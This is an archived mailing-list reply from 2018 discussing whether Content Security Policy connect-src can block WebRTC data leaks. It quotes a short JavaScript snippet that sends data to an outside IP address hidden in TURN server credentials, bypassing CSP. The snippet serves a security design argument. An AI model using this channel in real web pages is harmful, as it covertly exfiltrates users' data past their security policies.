Re: webRTC and Content Security Policy connect-src

On 12 January 2018 at 13:06, Sergio Garcia Murillo
<sergio.garcia.murillo@gmail.com> wrote:
> On 12/01/2018 13:01, Iñaki Baz Castillo wrote:
>
> To summarize: The current issue with ICE Lite is that it's not needed
>
> for the browser (ICE controlling) to provide the remote with the
> browser *internally* and *dynamically* generated tokens (such as the
> ice-ufrag). With my proposal above, this would change so the JS should
> always signal its local ice-ufrag to the remote (otherwise ICE
> responses would be discarded). And for that, the JS must send it via
> HTTP/WebSocket, so habemus CSP rules to block them.
>

> As I already pointed out in the issue, it is possible to leak small amounts
> of data just with:
>
> var pc = new
> RTCPeerConnection({"iceServers":[{"urls":["turn:74.125.140.127:19305?transport=udp"],"username":"_all_your_data_belongs_to_us","credential":"."}]});
> pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);


And as I already pointed out, my proposal above was just intended to
make both, Full ICE and ICE Lite, equally safe. :)

Leaking data via TURN credentials is a different subject (not less important).

Received on Friday, 12 January 2018 12:27:46 UTC